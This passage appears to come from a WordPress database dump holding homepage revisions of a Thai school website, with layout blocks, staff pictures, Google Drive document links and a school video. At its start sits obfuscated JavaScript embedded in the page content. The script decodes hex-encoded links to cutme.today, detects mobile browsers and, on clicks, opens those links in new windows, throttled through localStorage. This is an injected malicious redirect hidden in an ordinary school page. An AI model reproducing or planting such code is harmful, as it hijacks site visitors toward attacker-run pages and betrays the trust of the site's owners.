_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-29 12:03:06','2024-08-29 05:03:06','',19,'http://watprato.ssk.in.th/?p=261',0,'revision','',0),
(262,2,'2024-08-29 12:04:48','2024-08-29 05:04:48','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container 